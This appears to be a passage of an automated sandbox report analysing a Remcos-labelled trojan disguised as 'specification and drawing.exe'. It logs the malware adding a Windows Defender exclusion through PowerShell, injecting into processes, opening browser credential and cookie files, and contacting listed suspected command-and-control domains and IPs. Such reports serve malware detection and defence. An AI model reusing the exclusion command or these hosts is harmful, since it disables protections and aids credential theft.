                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Users\user\Desktop\specification and drawing.exe "C:\Users\user\Desktop\specification and drawing.exe"Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: LfvKCNKdvt.exe, 00000007.00000002.4586766630.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000000.2312450683.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590510372.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Users\user\Desktop\specification and drawing.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.2e3d4b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.2e3d4b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      412
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      121
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism
                      11
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566626 Sample: specification and drawing.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 35 www.swenansiansie.xyz 2->35 37 www.restobarbebek.xyz 2->37 39 19 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Antivirus detection for URL or domain 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 55 10 other signatures 2->55 10 specification and drawing.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 37->53 process4 file5 33 C:\...\specification and drawing.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 specification and drawing.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 LfvKCNKdvt.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 wscript.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 LfvKCNKdvt.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 rtpsilva4d.click 67.223.117.169, 50025, 50026, 50027 VIMRO-AS15189US United States 27->41 43 www.spectre.center 5.39.10.93, 49878, 49885, 49890 OVHFR France 27->43 45 7 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      specification and drawing.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                      specification and drawing.exe100%AviraHEUR/AGEN.1307356
                      specification and drawing.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://giganet.ua/ru0%Avira URL Cloudsafe
                      https://www.imena.ua/vps0%Avira URL Cloudsafe
                      https://www.imena.ua/domains0%Avira URL Cloudsafe
                      http://www.spectre.center/v70f/0%Avira URL Cloudsafe
                      http://www.restobarbebek.xyz/jm9b/100%Avira URL Cloudmalware
                      https://www.imena.ua/en/how-search0%Avira URL Cloudsafe
                      https://img.imena.ua/js/bundle.min.js0%Avira URL Cloudsafe
                      https://www.imena.ua/documents0%Avira URL Cloudsafe
                      http://inau.ua/0%Avira URL Cloudsafe
                      http://www.rtpsilva4d.click/mbcs/0%Avira URL Cloudsafe
                      http://www.synd.fun/6sgf/0%Avira URL Cloudsafe
                      http://www.cbprecise.online/cvmn/0%Avira URL Cloudsafe
                      https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac0%Avira URL Cloudsafe
                      http://www.wiretap.digital/gofy/0%Avira URL Cloudsafe
                      https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=0%Avira URL Cloudsafe
                      https://www.imena.ua/hosting0%Avira URL Cloudsafe
                      http://www.jagdud.store/ohf8/0%Avira URL Cloudsafe
                      https://www.imena.ua/domains/prices0%Avira URL Cloudsafe
                      https://www.imena.ua/0%Avira URL Cloudsafe
                      https://www.imena.ua/ua0%Avira URL Cloudsafe
                      http://partner.mirohost.net0%Avira URL Cloudsafe
                      https://www.imena.ua/datacenter0%Avira URL Cloudsafe
                      https://www.imena.ua/blog/0%Avira URL Cloudsafe
                      https://www.imena.ua/domains/premium-domains0%Avira URL Cloudsafe
                      https://www.imena.ua/how-search0%Avira URL Cloudsafe
                      https://www.imena.ua/domains/regtm0%Avira URL Cloudsafe
                      https://www.imena.ua/job0%Avira URL Cloudsafe
                      https://www.imena.ua/en0%Avira URL Cloudsafe
                      http://www.yun08ps.top/tjfd/0%Avira URL Cloudsafe
                      https://www.imena.ua/contact0%Avira URL Cloudsafe
                      https://img.imena.ua/css/media-set.css0%Avira URL Cloudsafe
                      https://control.mirohost.net/auth/login.php?lang=ru0%Avira URL Cloudsafe
                      https://control.imena.ua/login.php?lang=20%Avira URL Cloudsafe
                      https://www.imena.ua/help0%Avira URL Cloudsafe
                      http://www.ix.net.ua/ru0%Avira URL Cloudsafe
                      https://mail.mirohost.net0%Avira URL Cloudsafe
                      http://www.swenansiansie.xyz/08fk/0%Avira URL Cloudsafe
                      https://www.imena.ua/ru0%Avira URL Cloudsafe
                      https://companies.rbc.ru/0%Avira URL Cloudsafe
                      https://www.imena.ua/whois.php?domain=spectre.center0%Avira URL Cloudsafe
                      http://www.nagasl89.baby/w21a/0%Avira URL Cloudsafe
                      https://www.imena.ua/servers0%Avira URL Cloudsafe
                      http://www.nagasl89.baby0%Avira URL Cloudsafe
                      https://www.imena.ua/check-domain0%Avira URL Cloudsafe
                      https://www.imena.ua/payments0%Avira URL Cloudsafe
                      https://www.imena.ua/check-domain?step=transfer0%Avira URL Cloudsafe
                      https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua0%Avira URL Cloudsafe
                      https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii0%Avira URL Cloudsafe
                      http://www.it2sp8.vip/5l50/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      swenansiansie.xyz
                      3.33.130.190
                      truetrue
                        unknown
                        www.nagasl89.baby
                        162.159.140.104
                        truetrue
                          unknown
                          www.spectre.center
                          5.39.10.93
                          truetrue
                            unknown
                            cbprecise.online
                            3.33.130.190
                            truetrue
                              unknown
                              rtpsilva4d.click
                              67.223.117.169
                              truetrue
                                unknown
                                natroredirect.natrocdn.com
                                85.159.66.93
                                truefalse
                                  high
                                  it2sp8.vip
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    wiretap.digital
                                    3.33.130.190
                                    truetrue
                                      unknown
                                      www.sidqwdf.fun
                                      185.106.176.204
                                      truetrue
                                        unknown
                                        www.yun08ps.top
                                        47.238.157.253
                                        truetrue
                                          unknown
                                          www.themessageart.online
                                          208.91.197.27
                                          truetrue
                                            unknown
                                            www.synd.fun
                                            194.58.112.174
                                            truetrue
                                              unknown
                                              www.jagdud.store
                                              209.74.64.187
                                              truetrue
                                                unknown
                                                www.restobarbebek.xyz
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.cbprecise.online
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.rtpsilva4d.click
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.mp3cevir.xyz
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.swenansiansie.xyz
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          www.wiretap.digital
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.it2sp8.vip
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.restobarbebek.xyz/jm9b/true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.rtpsilva4d.click/mbcs/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.spectre.center/v70f/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.cbprecise.online/cvmn/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.synd.fun/6sgf/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.wiretap.digital/gofy/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jagdud.store/ohf8/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.yun08ps.top/tjfd/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.swenansiansie.xyz/08fk/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.nagasl89.baby/w21a/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.it2sp8.vip/5l50/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabwscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://giganet.ua/ruwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/ac/?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
